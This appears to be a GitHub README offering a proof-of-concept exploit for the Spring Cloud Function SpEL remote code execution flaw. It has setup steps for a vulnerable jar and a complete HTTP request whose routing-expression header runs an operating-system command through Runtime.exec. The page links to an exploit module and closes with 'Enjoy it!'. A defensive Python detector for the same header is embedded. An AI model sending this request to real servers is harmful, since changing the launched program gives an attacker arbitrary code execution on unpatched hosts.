cckuailong/spring-cloud-function-SpEL-RCE

spring-cloud-function SpEL RCE

Vultarget

You can build it yourself. Here is the source of the Vuln App

Or you can use the release built by cckuailong (yeah, it's me)

java -jar function-sample-pojo-3.2.1.RELEASE.jar

P.S. Test with Java 17

Poc

POST /xxx HTTP/1.1
Host: test.com:8080
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("/System/Applications/Calculator.app/Contents/MacOS/Calculator")
Content-Type: application/x-www-form-urlencoded
Content-Length: 3

xxx

Result

RCE!!
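
A defender-side check for the request shown above, as an added example that is not part of this repository: it flags any request carrying the spring.cloud.function.routing-expression header and escalates when the value contains a SpEL type reference T(...). The function names, severity labels and the two non-PoC sample requests are constructed for illustration.

```python
import re

# Header name taken from the PoC request on this page; HTTP header names are case-insensitive.
ROUTING_HEADER = "spring.cloud.function.routing-expression"
# SpEL type-reference operator T(...), the construct the PoC uses to reach java.lang.Runtime.
TYPE_REF = re.compile(r"\bT\s*\(")


def parse_headers(raw: str) -> dict:
    """Return lower-cased header names mapped to values from one raw HTTP request."""
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0]
    headers = {}
    for line in head.split("\n")[1:]:  # skip the request line
        name, sep, value = line.partition(":")
        if sep:  # lines without a colon (e.g. a body with no blank separator) are ignored
            headers[name.strip().lower()] = value.strip()
    return headers


def classify(raw: str) -> str:
    """'clean', 'suspicious' (header present) or 'high' (value holds a type reference)."""
    value = parse_headers(raw).get(ROUTING_HEADER)
    if value is None:
        return "clean"
    return "high" if TYPE_REF.search(value) else "suspicious"


# Constructed sample: ordinary request without the routing header.
BENIGN = "POST /xxx HTTP/1.1\r\nHost: test.com:8080\r\nContent-Type: text/plain\r\n\r\nhello"
# Constructed sample: client-supplied routing header in mixed case, naming a function.
ROUTED = ("POST /xxx HTTP/1.1\nHost: test.com:8080\n"
          "Spring.Cloud.Function.Routing-Expression: 'uppercase'\n\nhello")
# The PoC request from this page, headers and body as shown there.
POC = (
    "POST /xxx HTTP/1.1\n"
    "Host: test.com:8080\n"
    'spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime()'
    '.exec("/System/Applications/Calculator.app/Contents/MacOS/Calculator")\n'
    "Content-Type: application/x-www-form-urlencoded\n"
    "Content-Length: 3\n\nxxx"
)

if __name__ == "__main__":
    for label, request in (("benign", BENIGN), ("routed", ROUTED), ("poc", POC)):
        print(label, classify(request))
```

Any client-supplied value for this header is worth reviewing, since the header name alone shows the client is trying to steer function routing; the type-reference match only ranks the alert.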

demo

Enjoy it!

I put the poc code in the repo:

https://github.com/cckuailong/pocsploit

https://github.com/cckuailong/pocsploit/blob/master/modules/vulnerabilities/springcloud/springcloud-function-spel-rce.py

demo2

Article

About

spring-cloud-function SpEL RCE, Vultarget & Poc
